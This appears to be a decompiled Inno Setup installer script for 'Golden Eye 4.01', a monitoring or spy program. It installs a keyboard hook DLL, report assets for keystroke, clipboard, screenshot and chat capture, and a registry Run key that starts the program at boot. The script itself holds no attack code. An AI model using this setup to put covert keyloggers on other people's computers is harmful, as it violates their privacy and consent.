;InnoSetupVersion=5.0.4

[Setup]
AppName=Golden Eye
AppVerName=Golden Eye 4.01
AppId=Golden Eye
AppMutex=GoldenEyeExe
DefaultDirName={pf}\AGSeydsApp
DefaultGroupName=Golden Eye
OutputBaseFilename=geNormal
Compression=lzma
PrivilegesRequired=none
DisableProgramGroupPage=yes
LicenseFile=embedded\License.txt
WizardImageFile=embedded\WizardImage0.bmp
WizardSmallImageFile=embedded\WizardSmallImage0.bmp

[Files]
Source: "{app}\AGSeyApp.exe"; DestDir: "{app}"; Flags: ignoreversion 
Source: "{app}\BMPToJPG.dll"; DestDir: "{app}"; Flags: ignoreversion 
Source: "{app}\report\aim32.ico"; DestDir: "{app}\report"; Flags: ignoreversion 
Source: "{app}\report\app.ico"; DestDir: "{app}\report"; Flags: ignoreversion 
Source: "{app}\report\bullet.gif"; DestDir: "{app}\report"; Flags: ignoreversion 
Source: "{app}\report\Clipboard.ico"; DestDir: "{app}\report"; Flags: ignoreversion 
Source: "{app}\report\computer.ico"; DestDir: "{app}\report"; Flags: ignoreversion 
Source: "{app}\report\ExeFilePath.ico"; DestDir: "{app}\report"; Flags: ignoreversion 
Source: "{app}\report\eye3.jpg"; DestDir: "{app}\report"; Flags: ignoreversion 
Source: "{app}\report\FileFolder.ico"; DestDir: "{app}\report"; Flags: ignoreversion 
Source: "{app}\report\icq32.ico"; DestDir: "{app}\report"; Flags: ignoreversion 
Source: "{app}\report\ie.ico"; DestDir: "{app}\report"; Flags: ignoreversion 
Source: "{app}\report\keyboard.ico"; DestDir: "{app}\report"; Flags: ignoreversion 
Source: "{app}\report\Msm32.ico"; DestDir: "{app}\report"; Flags: ignoreversion 
Source: "{app}\report\rule.gif"; DestDir: "{app}\report"; Flags: ignoreversion 
Source: "{app}\report\rule2.gif"; DestDir: "{app}\report"; Flags: ignoreversion 
Source: "{app}\report\screenshot.ico"; DestDir: "{app}\report"; Flags: ignoreversion 
Source: "{app}\report\yahoo32.ico"; DestDir: "{app}\report"; Flags: ignoreversion 
Source: "{app}\OLEAUT32.DLL"; DestDir: "{app}"; Flags: uninsneveruninstall regserver sharedfile ignoreversion 
Source: "{app}\MSCOMCTL.OCX"; DestDir: "{app}"; Flags: uninsneveruninstall regserver sharedfile ignoreversion 
Source: "{app}\TabCtl32.ocx"; DestDir: "{app}"; Flags: uninsneveruninstall regserver sharedfile ignoreversion 
Source: "{app}\PICCLP32.OCX"; DestDir: "{app}"; Flags: uninsneveruninstall regserver sharedfile ignoreversion 
Source: "{app}\KBHOOK.DLL"; DestDir: "{app}"; Flags: ignoreversion 
Source: "{app}\help\Help.chm"; DestDir: "{app}\help"; Flags: ignoreversion 
Source: "{app}\License.txt"; DestDir: "{app}"; Flags: ignoreversion 

[Dirs]
Name: "{app}\help"; 
Name: "{app}\output"; 

[Registry]
Root: HKLM; Subkey: "Software\Microsoft\Windows\CurrentVersion\Run"; ValueName: "AGSeyApp"; ValueType: String; ValueData: "{app}\AGSeyApp.exe"; Flags: uninsdeletevalue 

[INI]
FileName: "{app}\ge.url"; Section: "InternetShortcut"; Key: "URL"; String: "http://www.monitoring-spy-software.com"; 

[Run]
Filename: "{app}\help\Help.chm"; Description: "View the Readme file"; Flags: shellexec postinstall nowait
Filename: "{app}\AGSeyApp.exe"; Description: "Launch Golden Eye"; Flags: postinstall skipifsilent nowait

[Icons]
Name: "{group}\Golden Eye"; Filename: "{app}\AGSeyApp.exe"; 
Name: "{group}\Golden Eye On The Web"; Filename: "{app}\ge.url"; 
Name: "{userdesktop}\Golden Eye"; Filename: "{app}\AGSeyApp.exe"; Tasks: desktopicon; 
Name: "{sys}\GoldenEye"; Filename: "{app}\AGSeyApp.exe"; WorkingDir: "{app}"; 
Name: "{app}\Golden Eye"; Filename: "{app}\AGSeyApp.exe"; WorkingDir: "{app}"; 
Name: "{group}\Help"; Filename: "{app}\help\Help.chm"; 
Name: "{group}\Uninstall Golden Eye"; Filename: "{app}\unins000.exe"; 
Name: "{app}\Uninstall Golden Eye"; Filename: "{app}\unins000.exe"; WorkingDir: "{app}"; 
Name: "{app}\Golden Eye On The Web"; Filename: "{app}\ge.url"; 
Name: "{app}\Help"; Filename: "{app}\help\Help.chm"; 

[Tasks]
Name: "desktopicon"; Description: "Create a &desktop icon"; GroupDescription: "Additional icons:"; 

[UninstallDelete]
Type: files; Name: "{app}\ge.dat"; 
Type: files; Name: "{app}\ge.url"; 

[CustomMessages]
default.NameAndVersion=%1 version %2
default.AdditionalIcons=Additional icons:
default.CreateDesktopIcon=Create a &desktop icon
default.CreateQuickLaunchIcon=Create a &Quick Launch icon
default.ProgramOnTheWeb=%1 on the Web
default.UninstallProgram=Uninstall %1
default.LaunchProgram=Launch %1
default.AssocFileExtension=&Associate %1 with the %2 file extension
default.AssocingFileExtension=Associating %1 with the %2 file extension...

[Languages]
; These files are stubs
; To achieve better results after recompilation, use the real language files
Name: "default"; MessagesFile: "embedded\default.isl"; 
